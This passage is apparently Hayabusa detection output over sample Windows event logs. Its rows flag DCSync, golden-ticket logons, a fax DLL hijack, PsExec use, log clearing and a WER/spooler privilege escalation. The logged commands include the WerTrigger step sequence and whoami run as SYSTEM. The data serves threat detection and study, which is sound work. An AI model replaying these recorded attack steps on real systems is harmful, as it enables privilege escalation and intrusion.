62274 : LogonID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55738 : LogonID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55748 : LogonID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54927 : LogonID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54931 : LogonID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54933 : LogonID: 
0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54932 : LogonID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55750 : LogonID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: 
gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket 
issued.evtx +2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx +2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wermgr.exe -upload",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: hack-admu-test1 : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP 
Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: JUMP01$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx +2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: not_existing_user : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx +2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: not_existing_user : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 
10.23.23.9 : Port: 50380 : LogonID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50317 : LogonID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - 
Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx +2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: 04246W-WIN10 : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60728 : LogonID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 : Path: 
C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe 